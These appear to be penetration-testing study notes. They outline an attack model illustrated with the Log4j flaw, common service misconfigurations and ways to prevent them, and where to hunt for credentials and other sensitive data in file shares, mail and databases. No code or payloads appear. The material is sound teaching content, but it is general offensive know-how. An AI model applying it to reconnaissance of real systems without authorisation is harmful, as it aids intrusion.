1.Protocol-specific-attacks
I. Attack Concepts: Source-Process-Privileges-Destination (SPPD)
Core Idea: Attacks follow a linear pattern:
Source: Information input (code, libraries, configs, APIs, user input).
Process: Information handling (PID, input, data processing, variables, logging).
Privileges: Access control (system, user, groups, policies, rules).
Destination: Outcome (local storage/processing, network transfer).
Log4j Example (CVE-2021-44228):
Source: Manipulated HTTP User-Agent (JNDI lookup).
Process: Log4j misinterprets input, executes lookup.
Privileges: Admin, due to logging permissions.
Destination: Attacker's server (malicious Java class), RCE.
II. Service Misconfigurations
Common Issues:
Default credentials (admin:admin, etc.).
Weak/no passwords.
Anonymous authentication.
Misconfigured access rights (RBAC, ACL).
Unnecessary defaults (enabled features, open ports).
OWASP Top 10 Relevance:
Unnecessary features.
Default accounts.
Error handling revealing sensitive info.
Prevention:
Lock down critical infrastructure.
Disable unnecessary features/ports.
Enforce strong passwords.
Regular scans/audits.
Repeatable hardening process.
Minimal platforms.
Patch management.
Segmented architecture.
Security Headers.
Automated verification.
III. Finding Sensitive Information
Detective Approach: Gather all details.
Examples:
Usernames, email addresses.
Passwords, DNS records, IPs.
Source code, configuration files.
Personally Identifiable Information (PII).
Key Services:
File shares (FTP, SMB).
Email (SMTP).
Databases (SQL).
Process:
Understand the service.
Know what to look for (target-specific).
Use all available information.
Tools:
Nmap, Metasploit, sqlmap, grep, find, custom scripts.
IV. General Attack Notes
Every piece of information is valuable.
Misconfigurations lead to information leaks and potential RCE.
Privilege escalation is a critical attack vector.
Automation helps in information gathering.
Real-world scenarios and case studies are vital.
Attack flow diagrams visualize SPPD.
Last updated